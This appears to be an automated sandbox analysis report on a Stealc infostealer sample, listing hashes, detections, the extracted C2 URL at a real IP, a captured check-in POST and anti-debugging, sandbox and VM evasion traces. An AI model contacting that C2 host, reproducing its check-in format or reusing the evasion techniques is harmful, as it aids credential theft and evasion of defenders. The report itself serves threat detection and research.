
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1543580
MD5: 6fb5f961b07cc3d84be8823133c05c50
SHA1: 482608c2008a693ff1bad6ca205dec70ef67e370
SHA256: b42bb6681e8e078f5c11a99ad67040722bc93a9eebb2f4f5604f6c571112b488
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6FB5F961B07CC3D84BE8823133C05C50)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration: {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Yara matches (network capture, memory dumps, unpacked PE):

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1350066957.0000000005670000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7328 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7328 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.e10000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alert:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-28T07:18:28.265872+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49704 | 185.215.113.206 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.e10000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: http://185.215.113.206/6c4adf523b719729.php | Virustotal: Detection: 16%
Source: file.exe | ReversingLabs: Detection: 39%
Source: file.exe | Virustotal: Detection: 41%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E29030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E172A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1A2B0 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU | source: file.exe, 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1350066957.000000000569B000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: my_library.pdb | source: file.exe, file.exe, 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1350066957.000000000569B000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E11710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E24B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E23B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E1DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49704 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /6c4adf523b719729.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFH
  Host: 185.215.113.206
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Ascii: ------DBFIEHDHIIIECAAKECFH Content-Disposition: form-data; name="hwid" A8A7533439EB3294564547 ------DBFIEHDHIIIECAAKECFH Content-Disposition: form-data; name="build" tale ------DBFIEHDHIIIECAAKECFH--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E162D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/&
Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1391285301.0000000001AB4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php//
Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php=6u2
Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpI5
Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpU5
Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpl
Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpq5
Source: file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php~
Source: file.exe, 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206RG
Source: file.exe, file.exe, 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1350066957.000000000569B000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00E14610 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: gaborkim ZLIB complexity 0.994803874890126
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E29790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E23970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\93WQ31SM.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 2185728 > 1048576
Source: file.exe | Static PE information: Raw size of gaborkim is bigger than: 0x100000 < 0x1aaa00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.e10000.0.unpack :EW;.rsrc :W;.idata :W; :EW;gaborkim:EW;pqqqwztq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;gaborkim:EW;pqqqwztq:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E29BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x2168d6 should be: 0x218ab4
Source: file.exe | Static PE information: section name: gaborkim
Source: file.exe | Static PE information: section name: pqqqwztq
Source: file.exe | Static PE information: section name: .taggant
Source: file.exe | Static PE information: section name: gaborkim entropy: 7.953963790635809

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-37532
                Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FE022 second address: 10FE034 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8ED0C920C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F8ED0C920C6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127BCA6 second address: 127BCAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128124D second address: 1281255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1281255 second address: 1281259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1281259 second address: 128125F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128125F second address: 1281271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F8ED0E3C3DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1281271 second address: 1281275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12814EE second address: 1281516 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8ED0E3C3E6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1281516 second address: 128151C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128151C second address: 128152F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jnl 00007F8ED0E3C3D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128152F second address: 1281539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1281539 second address: 128153E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12832B2 second address: 12832CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8ED0C920C6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f je 00007F8ED0C920D4h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12832CB second address: 12832CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128335F second address: 128337E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 58C969BAh 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F8ED0C920CCh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128337E second address: 12833CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8ED0E3C3E8h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 58C9693Ah 0x00000012 mov si, 1B11h 0x00000016 push 00000003h 0x00000018 mov esi, dword ptr [ebp+122D3613h] 0x0000001e push 00000000h 0x00000020 mov si, bx 0x00000023 push 00000003h 0x00000025 call 00007F8ED0E3C3D9h 0x0000002a jbe 00007F8ED0E3C3E4h 0x00000030 pushad 0x00000031 jg 00007F8ED0E3C3D6h 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12833CE second address: 12833DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12833DB second address: 12833E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1295AAD second address: 1295AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1295AB5 second address: 1295AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1295AB9 second address: 1295ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1271D13 second address: 1271D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1271D19 second address: 1271D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8ED0C920D4h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A4445 second address: 12A4449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A474D second address: 12A4753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A4753 second address: 12A4757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A4757 second address: 12A475F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A4DF4 second address: 12A4E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8ED0E3C3E3h 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A5103 second address: 12A5107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A5107 second address: 12A512A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8ED0E3C3E9h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A512A second address: 12A5160 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920CEh 0x00000007 jo 00007F8ED0C920C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8ED0C920D9h 0x00000014 popad 0x00000015 push edx 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A5160 second address: 12A5166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A5166 second address: 12A5172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A52C5 second address: 12A52DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A52DD second address: 12A52E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A52E3 second address: 12A52E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A52E9 second address: 12A52ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A52ED second address: 12A5309 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F8ED0E3C3DCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1276D4C second address: 1276D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1276D50 second address: 1276D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F8ED0E3C3F0h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
